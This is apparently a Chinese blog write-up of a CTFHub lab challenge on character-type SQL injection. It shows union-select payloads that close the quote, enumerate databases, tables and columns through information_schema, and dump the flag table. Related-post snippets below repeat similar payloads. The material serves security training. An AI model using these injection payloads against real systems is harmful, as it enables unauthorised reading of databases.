【ctfhub】SQL注入字符型注入

最新推荐文章于 2024-08-14 08:00:00 发布

蔓蔓的学习记录

最新推荐文章于 2024-08-14 08:00:00 发布

阅读量351

点赞数

分类专栏： ctf 文章标签： sql 数据库

本文链接：https://blog.csdn.net/manerzi/article/details/127169368

版权

ctf 专栏收录该内容

19 篇文章 0 订阅

订阅专栏

题目描述：

在这里插入图片描述
输入1试试
查询列数
注意为字符型注入，所以我们要在末尾加#符合语法规范
确定为两列，接下来同整数型注入一样,但是要注意闭合引号
查询数据库名

-1' union select 1,group_concat(schema_name) from information_schema.schemata#

在这里插入图片描述查询表名

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#

在这里插入图片描述

查询列名

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' && table_name='flag'#

在这里插入图片描述
查询flag表中的flag字段

-1' union select 1, group_concat(flag) from flag#

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

蔓蔓的学习记录

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

[CTF] SQL注入的一些经验总结（未完待续）【更新：2022.11.25】

ZXW_NUDT的博客

11-17

6260

关于SQL注入的思维导图可以点开看一下大图

CTFHUB-web-SQL注入

ookami6497的博客

11-29

823

CTFHUB SQL

参与评论您还未登录，请先登录后发表或查看评论

CTFHub:web前置技能-SQL注入-整数型注入

wdnmddbl的博客

06-08

769

路漫漫其修远兮，吾将上下而求索。本文涉及以下知识点，去引用文章学习即可：链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点，希望对你有所帮助。大概思路和涉及的知识点sql注入基本语句和手工注入流程：#，–+，-- -代表后边忽略，常用与闭合思路：sql注入之数字型注入点：许多网页链接有类似的结构。

CTFHub~SQL注入超简单详细教程

最新发布

weixin_67832625的博客

08-14

906

本文主要是对CTFHub靶场的SQL注入做了详细的教程讲解，让练习者对SQL注入有更详细的了解和深入，如有什么问题，随时联系作者

CTFHub 字符型SQL注入

Leon~博客

03-14

4243

字符型SQL注入 目录一、判断是否存在注入二、判断select语句中有几列三、判断显示的信息是第几列的信息四、利用函数来收集数据库信息五、通过union查询数据库 1、获取所有数据库名称 2、查询数据库中有多少个表 3、查询指定数据库中的表名 4、查询指定数据库指定表中的列名 5、查询指定...

CTFHub (web-SQL-字符型注入)

m0_64444909的博客

04-29

2604

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档阅读目录一、limit和group_concat查询的区别二、对字符型数据的解释三、实战解题步骤1.进入靶场，一、limit和group_concat查询的区别 1.列出所有数据库 limit 一个一个打印出来库名 group_concat 一次性全部显示 2.列出(数据库: )中所有的表名 limit 一个一个打印出来表名 group_concat 一次性全部显示 3.列出（数据库：表：）中所有的字段名 limit 一个.

CTFHUB-SQL字符型注入

Web学习之路

03-07

323

很简单的，用心

CTFHub SQL注入

万丈⾼楼平地起，勿在浮沙筑⾼台学艺不精的安全菜鸡，改行回家养猪了，对博客有疑问欢迎留言，看到一定回

02-09

1120

ctfhub的SQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句，根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数首先使用order by 3 ，页面无回显，改为2之后页面显示正确。因此判断当前数据库当前表，共有2个字段。 3、使用联合查询，判断页面显示位首先将id改为一个不存在的纸，根据联合查询的特性，就会返回11111，222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数

Ctfhub解题 web SQL注入(全部完整版)

weixin_46703850的博客

03-15

5502

Ctfhub解题 web SQL注入

sql注入基础（ctfhub sql注入）

kofi的博客，已停更

08-15

774

（持续更新中）sql注入基础0x00 前言 0x00 前言这两天在CTFHub上练题，刚好练到了SQL注入这个之前我一直也不是很懂，这回一做发现其中大有玄妙，所以就一起写个小总结。 CTFhHub：https://www.ctfhub.com/#/index 上面这张图是CTFHub的SQL注入技能树 ...

CTFHUB-WEB-SQL注入

K_ShenH的博客

06-09

1241

CTFHUB-WEB-SQL注入

CTFHUB-SQL注入-字符型注入

u014794539的博客

07-09

327

考点字符型SQL注入 分析过程先输入个1 因为是字符型注入一般先判断是否存在注入点加单引号后变成三个单引号，则无法执行 playload: ?id='1'' playload: ’and 1=1 也不行 playload: ' and 1=1 --' 可以成功执行 playload: 'and 1=2 --' 报错然后判断列数 playload: id='1' order by 3 -- '' id='1' order by 2 -- '' 3时无回显则字段数量为2 查询是第

CTFHUB-技能树-Web题-SQL注入-字符型注入

Static______的博客

03-29

494

对于字符型注入，可在url中输入。由此判断回显字段为1，2字段。由此判断字段数为两个。

SQL 字符型注入ctfhub

m0_63563528的博客

12-08

276

字符型注入ctfhub

CTFHub技能树web（持续更新）--SQL注入--字符型注入

jiuyongpinyin的博客

08-12

465

字符型注入这道题和上一道基本一样，而且很简单，因为是有回显的，知道是拿什么字符包裹的语句，就知道拿什么字符使语句闭合，例如这道题：我们截断语句之后，回显发现是使用单引号包裹的语句，所以我们使用单引号来使语句闭合，使用order by 语句来查列： ?id=1' order by 2 --+ 查看是否可以使用联合查询语句： ?id=111' union select 1,2 --+ 查看数据库： ?id=111' union select 1,database()--+ 查看列： ?id=

CTFHub SQL字符型注入

weixin_44732566的博客

02-17

3573

CTFHub SQL字符型注入题目说的很清楚，字符型注入，需要注意引号和注释和整数型注入一样，回显只有两处：ID和Da，直接上联合查询 123’ union select database(),2 # 得到数据库，接着查表 123' union select group_concat(table_name),3 from information_schema.tables where ta...

CTFHUB——字符型注入

陈艺秋的博客

01-14

507

sql整数型注入

ctfhub-sql注入-字符型注入

m0_62094846的博客

11-12

685

说明输入1不能给我们有用的信息，但输入1'会显示错误查询字符型注入，可以输入1"试试没有报错（不过好像目前没什么用，确定字段数时用1’也一样），记得一定一定加#，不然没用有2个字段数确定回显位语句只能放在第二个位上查找数据库 猜测在sqli里查找表查找字段 ...

CTFHUB技能树SQL注入整数型和字符型注入

PigletTT的博客

07-03

1430

CTFHUB 技能树SQL注入整数型一、关键词和过程 1.关键词解释关键字/语句/函数的解释 union select //联合查询，联合注入常用 database() //回显当前连接的数据库名称 version() //查看当前sql的版本如：mysql 1.2.3， mariadb-4.5.6 group_concat() //把产生的同一分组中的值用,连接，形成一个字符串 information_schema //存了很多mysql信息的数据库 information_schema

复现awvs扫描sql注入字符型

05-01

复现awvs扫描SQL注入字符型需要按照以下步骤进行： 1. 选择合适的目标：需要选择一个有可能存在SQL注入漏洞的目标，通常是包含动态内容的Web应用程序。 2. 扫描目标：使用AWVS对目标进行扫描。在扫描设置中，需要开启SQL注入扫描。 3. 扫描结果分析：在扫描完成后，需要分析扫描结果，查看是否存在SQL注入漏洞。 4. 构造攻击向量：如果存在SQL注入漏洞，需要构造相应的攻击向量进行测试。字符型注入通常涉及到单引号和双引号的转义，以及一些特殊字符的过滤。 5. 验证漏洞：使用构造的攻击向量验证漏洞，如果能够成功执行SQL语句，则说明漏洞存在。 6. 提供修复建议：验证漏洞后，需要提供相应的修复建议，例如使用参数化查询、过滤特殊字符等方式进行修复。总之，复现AWVS扫描SQL注入字符型需要一定的技术基础和经验，需要仔细分析扫描结果和构造攻击向量，以确保漏洞验证的准确性和安全性。